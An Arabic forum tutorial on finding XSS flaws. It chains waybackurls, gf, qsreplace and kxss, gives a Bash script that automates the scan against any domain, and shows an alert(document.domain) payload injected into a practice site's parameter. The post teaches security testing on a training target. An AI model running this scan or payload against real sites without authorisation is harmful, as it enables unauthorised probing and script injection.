شرح أكتشاف ثغرات XSS فى الموقع + الأدوات اللازمة

  1. المدير العام

    المدير العام أدارة موقع أكتب كود

    شرح أكتشاف ثغرات XSS فى الموقع + الأدوات اللازمة
    باستخدام مجموعة أدوات [waybackurls - gf - qsreplace - kxss] :

    شرح الادوات :
    1. تقوم اداة waybackurls بجمع كل العناوين URLs الخاصة بالموقع مع كل المجالات الفرعية :
    2. تقوم اداة sort -u بفلترة العناوين المكررة
    3. تقوم اداة gf xss بفلترة العناوين مع الباراميتر التي تقبل المدخلات مثل
    كود:
    [https://target.com?name=test]
    4. تقوم اداة tee -a باخراج النتائج في ملف
    5. تقوم اداة qsreplace باستبدال قيمة الباراميتر بقيمة FUZZ
    6. تقوم اداة kxss بفحص كل الباراميتر واستبدال كلمة FUZZ بمجموعة مدخلات مثل [ "><' ] للتحقق من ثغرة XSS و HTML Injection
    7. امر pipe (|) لإعادة توجيه المخرجات والنتائج من برنامج إلى آخر

    تنزيل الادوات باتباع الخطوات التالية بالترتيب :
    كود:
    > sudo apt install golang-go
> go get github.com/tomnomnom/waybackurls
> go get -u github.com/tomnomnom/gf
> cd ~/
> git clone https://github.com/1ndianl33t/Gf-Patterns
> mkdir .gf
> mv ~/Gf-Patterns/*.json ~/.gf
> rm -rf ~/Gf-Patterns/
> go get -u github.com/tomnomnom/qsreplace
> go get github.com/Emoe/kxss
    لتستطيع تشغيل الادوات من الترمنال مباشرة قم بنقل الاداوت الى المسار التالي :
    كود:
    > cd ~/go/bin/
> sudo cp waybackurls gf qsreplace kxss /usr/bin
    الان سنقوم بفحص موقع http://sudo.co.il/xss الخاص بالتدرب على اكتشاف ثغرات XSS :

    [​IMG]

    استخدام اداة waybackurls مع اسم الموقع فقط بدون https :
    كود:
    > waybackurls sudo.co.il/xss | sort -u >> waybackdata.txt
> cat waybackdata.txt | gf xss | tee -a xss1.txt | qsreplace FUZZ >> xss2.txt
> cat xss2.txt | kxss |tee kxss.txt
    [​IMG]

    كل URLs التي تم عرضها لاتقوم بفلترة المدخلات [" < > $ | ( ) ` : ; { }] :
    كود:
     http://sudo.co.il:80/xss/level5-1.php?p=FUZZ"><
    [​IMG]

    Source Code :
    [​IMG]

    البايلود المناسب لتنفيذ سكربت في الموقع المصاب :
    كود:
    ';alert(document.domain);'
http://sudo.co.il:80/xss/level5-1.php?p=FUZZ';alert(document.domain);'
    [​IMG]

    سنقوم بانشاء سكربت بلغة Bash لأتمتة كل الاوامر السابقة في امر واحد :
    Bash Script : script.sh
    ========================
    كود:
    #!/bin/bash
waybackurls $1 | sort -u >> waybackdata.txt
cat waybackdata.txt | gf xss | tee -a xss1.txt | qsreplace FUZZ >> xss2.txt
cat xss2.txt | kxss |tee kxss.txt
    =========================
    نقوم باعطاء السكربت صلاحيات التنفيذ
    كود:
     sudo chmod +x script.sh
    تنفيذ السكربت مع اسم الموقع فقط بدون https
    Example :
    كود:
    ./script.sh target.com
./script.sh sudo.co.il:80/xss
    [​IMG]
     
    المدير العام ، ‏6/10/2021
    #1
جاري تحميل الصفحة...
المشاركات المتشابهة - شرح أكتشاف ثغرات
  1. المدير العام

    عشرين نصيحة مع الشرح العملي تساعدك علي أكتشاف الثغرات

    المدير العام, ‏3/7/2022, في منتدى: منتدى أختبار أختراق المواقع والسيرفرات
    الردود:
    0
    المشاهدات:
    339
    المدير العام
    ‏3/7/2022
  2. المدير العام

    شرح طريقة أكتشاف ثغرة XVWA - SQL Injection

    المدير العام, ‏5/3/2022, في منتدى: منتدى أختبار أختراق المواقع والسيرفرات
    الردود:
    0
    المشاهدات:
    283
    المدير العام
    ‏5/3/2022
  3. المدير العام

    شرح طريقة أكتشاف ثغرة XVWA - Blind SQL Injection

    المدير العام, ‏5/3/2022, في منتدى: منتدى أختبار أختراق المواقع والسيرفرات
    الردود:
    0
    المشاهدات:
    262
    المدير العام
    ‏5/3/2022
  4. المدير العام

    شرح طريقة أكتشاف ثغرة XVWA - Command Injection

    المدير العام, ‏5/3/2022, في منتدى: منتدى أختبار أختراق المواقع والسيرفرات
    الردود:
    0
    المشاهدات:
    258
    المدير العام
    ‏5/3/2022
  5. المدير العام

    شرح طريقة أكتشاف ثغرة Response Manipulation

    المدير العام, ‏5/2/2022, في منتدى: منتدى أختبار أختراق المواقع والسيرفرات
    الردود:
    0
    المشاهدات:
    379
    المدير العام
    ‏5/2/2022